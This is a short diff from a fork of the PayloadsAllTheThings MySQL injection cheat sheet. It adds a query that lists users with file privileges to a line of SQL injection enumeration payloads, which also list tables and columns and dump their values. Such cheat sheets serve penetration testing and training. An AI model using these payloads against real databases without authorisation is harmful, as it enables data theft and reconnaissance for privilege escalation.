carlospolop-forks/PayloadsAllTheThings/SQL injection/MySQL Injection.md

-SELECT table_name FROM information_schema.tables WHERE table_schema=database();#Get name of the tables SELECT column_name FROM information_schema.columns WHERE table_name="<TABLE_NAME>"; #Get name of the columns of the table SELECT <COLUMN1>,<COLUMN2> FROM <TABLE_NAME>; #Get values
+SELECT table_name FROM information_schema.tables WHERE table_schema=database();#Get name of the tables SELECT column_name FROM information_schema.columns WHERE table_name="<TABLE_NAME>"; #Get name of the columns of the table SELECT <COLUMN1>,<COLUMN2> FROM <TABLE_NAME>; #Get values SELECT user FROM mysql.user WHERE file_priv='Y'; #Users with file privileges
 ```

 **Only 1 value**